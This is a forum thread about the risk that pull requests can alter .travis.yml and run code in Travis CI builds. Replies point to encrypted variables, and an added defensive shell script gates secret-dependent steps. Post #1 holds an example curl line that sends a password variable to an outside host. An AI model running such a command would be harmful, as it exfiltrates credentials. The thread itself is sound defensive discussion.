A risk about `Build pushed pull requests`

#1

If we enable Build pushed pull requests, PRs will trigger builds.

Anyone can modify the .travis.yml file in a PR, which means that if Build pushed pull requests is turned on, attackers can do anything in CI.

Such as:

`curl http://example.com/xxx?v=$password`

How to get rid of this risk?

#2

Use encrypted environment variables.

Encrypted environment variables are not available to pull requests from forks due to the security risk of exposing such information to unknown code.

https://docs.travis-ci.com/user/environment-variables/#defining-encrypted-variables-in-travisyml

#3

You cannot use encrypted variables on PR builds (from forks) due to security risks. https://docs.travis-ci.com/user/pull-requests/#pull-requests-and-security-restrictions

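The answers in #2 and #3 rely on Travis itself withholding decrypted variables from fork PR builds. The build script should also be written so that steps which need a secret are explicitly skipped when it is absent, rather than running with an empty value. The following is an added example, not code from the thread or from the Travis CI documentation; it uses two variables Travis does set in every job, TRAVIS_PULL_REQUEST ("false" for a branch build, the PR number otherwise) and TRAVIS_SECURE_ENV_VARS ("true" only when encrypted variables were decrypted). The name deploy.sh is a hypothetical placeholder.

```shell
#!/bin/sh
# Added example: gate secret-dependent CI steps on the Travis job context.
# Assumes the job environment exports TRAVIS_PULL_REQUEST and
# TRAVIS_SECURE_ENV_VARS as Travis documents them.

# secrets_allowed PR SECURE
# Succeeds (exit 0) only for a non-PR build in which encrypted variables
# were actually decrypted. A PR build from a fork never reaches that state,
# and a PR build from a branch of the same repository is also refused
# (conservative: nothing that depends on a secret runs for any PR).
secrets_allowed() {
  pr="$1"
  secure="$2"
  [ "$pr" = "false" ] && [ "$secure" = "true" ]
}

# decide_step PR SECURE
# Prints "deploy" when the secret-dependent step may run, "skip" otherwise.
decide_step() {
  if secrets_allowed "$1" "$2"; then
    echo deploy
  else
    echo skip
  fi
}

# Entry point used from .travis.yml, e.g.
#   env:
#     global:
#       - secure: "<output of: travis encrypt DEPLOY_TOKEN=...>"
#   script:
#     - make test
#   after_success:
#     - sh ci/guarded-deploy.sh      # this file (hypothetical path)
main() {
  step=$(decide_step "${TRAVIS_PULL_REQUEST:-false}" "${TRAVIS_SECURE_ENV_VARS:-false}")
  if [ "$step" = "deploy" ]; then
    echo "secret-dependent step allowed; running deploy"
    # ./deploy.sh   # hypothetical script that consumes DEPLOY_TOKEN
  else
    echo "skipping secret-dependent step (PR=${TRAVIS_PULL_REQUEST:-unset}, secure=${TRAVIS_SECURE_ENV_VARS:-unset})"
  fi
}
```

Call `main` at the end of the file when using it as a real CI step. Keeping the decision in a function that takes the two values as arguments makes the rule testable locally without a Travis environment, and checking TRAVIS_SECURE_ENV_VARS in addition to TRAVIS_PULL_REQUEST means a misconfigured branch build with no decrypted variables is skipped rather than run with an empty token.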
#4

Thank you very much

#5

Thank you too